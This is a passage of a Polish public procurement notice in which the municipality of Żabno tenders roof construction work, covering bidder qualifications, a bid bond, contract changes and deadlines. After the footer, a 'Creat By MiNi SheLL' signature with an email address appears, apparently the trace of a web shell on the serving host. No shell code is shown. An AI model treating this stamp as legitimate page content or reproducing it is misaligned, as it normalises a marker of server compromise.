lub zawodowej:Zamawiający uzna, że wykonawca spełnia<br/>warunek w/w zakresie jeżeli wykaże, że wykonał w sposób należyty, zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończył, nie wcześniej niż w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co<br/>najmniej 1 robotę budowlaną polegającą na budowie, przebudowie lub remoncie dachu budynku, której wartość wyniosła co najmniej 200 000,00 zł brutto (słownie: dwieście tysięcy<br/>złotych). Formularz wykaz robót budowlanych stanowi Załącznik nr 8 do SWZ.Odnośnie do<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te<br/>zdolności są wymagane.W takim przypadku Wykonawcy składają oświadczenie, określone w<br/>art. 117 ust. 4 ustawy Pzp, którego wzór określony został w Załączniku nr 11 do SWZ.W<br/>przypadku posługiwania się przez wykonawcę cudzym potencjałem, wykonawcy mogą polegać<br/>na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W zakresie potwierdzenia braku podstaw do wykluczenia:􀀀 oświadczenia wykonawcy, w zakresie art.<br/>108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z<br/>dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z<br/>innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do<br/>udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej (którego wzór stanowi załącznik nr 9 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W zakresie potwierdzenia spełniania warunków udziału w postępowaniu:􀀀<br/>wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z<br/>podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz, których roboty budowlane<br/>zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały<br/>wykonane należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz,<br/>którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym<br/>charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty, zgodnie z<br/>wymogiem określonym w Rozdziale II ust. 2 pkt.7.2) SWZ.􀀀 dokumentu potwierdzającego, że<br/>wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego, w<br/>Rozdziale II ust. 2 pkt.7.2) SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1) Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu<br/>składania ofert, wnieść wadium w kwocie: 4.000,00 zł (słownie: cztery tysiące złotych).2)<br/>Wadium musi obejmować pełen okres związania ofertą, tj. do dnia 23.07.2021 r.. 3) Wadium<br/>może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.4)<br/>Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy w Banku BSR<br/>oddział Żabno Nr 58 8589 0006 0290 0930 4053 0012 z dopiskiem “wpłata wadium – sprawa nr<br/>RG.271.14.21.ŁZ”. 5) Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego<br/>najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy<br/>zamawiającego).6) Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem<br/>elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:- nazwę<br/>dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego),<br/>gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym w gwarancji lub<br/>poręczeniu musi być Gmina Żabno z siedzibą ul. Jagiełły 1, 33-240 Żabno,- określenie<br/>wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,- kwotę<br/>gwarancji/poręczenia,- termin ważności gwarancji/poręczenia,- zobowiązanie gwaranta do<br/>zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie<br/>zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.7) W przypadku, gdy<br/>wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w<br/>przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na<br/>podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.8) Zamawiający dokona zwrotu wadium na<br/>zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.9) Zamawiający zatrzymuje wadium wraz z<br/>odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim<br/>przypadku:•Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika<br/>doreprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i<br/>zawarciaumowy w sprawie przedmiotowego zamówienia publicznego.• Wszelka korespondencja<br/>będzieprowadzona przez zamawiającego wyłącznie z pełnomocnikiem.Oświadczenie<br/>potwierdzającebrak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w<br/>postępowaniuskłada każdy z wykonawców wspólnie ubiegających się o zamówienie. Odnośnie<br/>dowykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni polegać<br/>nazdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których<br/>tezdolności są wymagane.W takim przypadku Wykonawcy składają oświadczenie, określone<br/>wart. 117 ust. 4 ustawy Pzp, którego wzór określony został w Załączniku nr 11 do SWZ.Pozostałewymagania określają dokumenty zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszczalne są następujące przypadki zmiany i warunki zmiany treści umowy:a)Zmiana<br/>materiałów budowlanych, sprzętu, urządzeń, sposobu wykonania gdy wykorzystanie<br/>materiałówbudowlanych, sprzętu i urządzeń wskazanych w dokumentacji projektowej lub<br/>ofercie, sposobu wykonania stanie się niemożliwe lub podyktowane będzie usprawnieniem<br/>procesu budowy,postępem technologicznym, zwiększeniem bezpieczeństwa na<br/>budowie,b)Zmiana terminu realizacji przedmiotu zamówienia i wynagrodzenia Wykonawcy w<br/>przypadku: działania siły wyższej, uniemożliwiającej wykonanie robót w określonym pierwotnie<br/>terminie, zaistnienianiesprzyjających warunków atmosferycznych, uniemożliwiających wykonanie<br/>robótlub spełnienie wymogów technologicznych udokumentowanych w dzienniku budowy,<br/>konieczności uzyskania decyzji i uzgodnień, mogąca spowodować wstrzymanie robót,<br/>konieczności wykonania dodatkowych badań i ekspertyz, przedłużającej się procedury administracyjnej z przyczyn niezależnych od Wykonawcy. zmiany sposobu przeprowadzenia robót, ograniczenia zakresu robót lub wprowadzeniem robót zamiennych.  konieczności<br/>wprowadzenia zmian w dokumentacji projektowej, a wynikających z konieczności<br/>dostosowaniazakresu zadania do powszechnie obowiązujących przepisów prawa braku<br/>możliwości prowadzenia robót na skutek warunków klimatycznych: (gwałtowne opady deszczu,<br/>gradobicie, śnieżyce, powodzie i inne anomalia klimatyczne) uniemożliwiające prowadzenie<br/>robót budowlanych, przeprowadzanie prób(sprawdzeń), dokonanie odbiorów, przez okres<br/>powyżej 4dni,  nieterminowego, z przyczyn niezależnych od Wykonawcy, przekazaniem przez<br/>Zamawiającego terenu budowy Wykonawcy, wstrzymania prac budowlanych przez właściwy<br/>organ z przyczyn niezależnych od Wykonawcy, innych okolicznościami niepowstałych z winy<br/>Wykonawcy (m.in. koniecznością wykonania robót dodatkowych lub robót zamiennych;<br/>koniecznością wykonania robót przez innego Wykonawcę w miejscu wykonywania prac<br/>budowlanych), c) Zmiana wynagrodzenia za realizację zadań objętych niniejszą Umową wprzypadku zmiany stawki podatku VAT. Opis sposobu dokonywania zmian zawarty został w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-24 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-24 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1) Zamawiający stawia wymóg w zakresie zatrudnienia przez wykonawcę lub podwykonawcę na<br/>podstawie stosunku pracy osób wykonujących niżej wskazane czynności w zakresie realizacji<br/>zamówienia.2) Rodzaj czynności związanych z realizacją zamówienia, których dotyczą<br/>wymagania zatrudnienia na podstawie stosunku pracy przez wykonawcę lub podwykonawcę<br/>osób wykonujących czynności w trakcie realizacji zamówienia: a) Roboty ogólnobudowlane. 3)<br/>W trakcie realizacji zamówienia Zamawiający uprawniony jest do wykonywania czynności<br/>kontrolnych wobec wykonawcy lub podwykonawcy, odnośnie spełniania przez nich wymogu<br/>zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie 2)<br/>czynności. Zamawiający uprawniony jest w szczególności do: a) żądania oświadczeń i<br/>dokumentów w zakresie potwierdzenia spełniania ww. wymogów i dokonywania ich oceny, w<br/>tym:• oświadczeniazatrudnionego pracownika,• oświadczenia wykonawcy lub podwykonawcy o<br/>zatrudnieniu pracownika na podstawie umowy o pracę,• poświadczonej za zgodność z<br/>oryginałem kopii umowy o pracę zatrudnionego pracownika,• innych dokumentów zawierających<br/>informacje, w tym dane osobowe, niezbędne do weryfikacji zatrudnienia na podstawie umowy o<br/>pracę, w szczególności imię i nazwisko zatrudnionego pracownika, datę zawarcia umowy o<br/>pracę, rodzajumowy o pracę i zakres obowiązków pracownika b) żądania wyjaśnień w<br/>przypadku wątpliwości w zakresie potwierdzenia spełniania ww. wymogów,c) przeprowadzania<br/>kontroli na miejscu wykonywania świadczenia.4) Wykonawca, którego oferta zostanie wybrana<br/>za najkorzystniejszą, w terminie do 5 dni od dnia podpisania umowy, w sprawie realizacji<br/>zamówienia, przedstawi Zamawiającemu w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym stosowne oświadczenie wykonawcy lub podwykonawcy o<br/>zatrudnieniu na podstawie umowy o pracę osób wykonujących czynności. Oświadczenie to<br/>powinno zawierać w szczególności: dokładne określenie podmiotu składającego oświadczenie,<br/>datę złożenia oświadczenia, wskazanie, że czynności w trakcie realizacji zamówienia, określone<br/>w pkt. 3), wykonują osoby zatrudnione na podstawie umowy o pracę, wraz ze wskazaniem liczby tych osób, rodzaju umowy o pracę i wymiaru etatu oraz podpis osoby uprawnionej do<br/>złożenia oświadczenia w imieniu wykonawcy lub podwykonawcy.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-07 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com